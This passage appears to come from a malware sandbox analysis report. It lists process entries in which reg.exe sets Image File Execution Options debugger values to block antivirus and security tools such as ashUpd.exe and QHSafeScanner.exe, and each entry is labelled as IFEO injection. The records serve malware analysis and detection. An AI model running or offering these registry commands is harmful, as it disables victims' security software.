  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSafeScanner.exe" /v debugger /t REG_SZ /d QHSafeScanner.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:2912
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TraceClean.exe" /v debugger /t REG_SZ /d TraceClean.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:888
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwServ.exe" /v debugger /t REG_SZ /d afwServ.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:1184
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashUpd.exe" /v debugger /t REG_SZ /d ashUpd.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:3116
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashQuick.exe" /v debugger /t REG_SZ /d ashQuick.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:4052
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashUpd.exe" /v debugger /t REG_SZ /d ashUpd.exe
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  PID:1624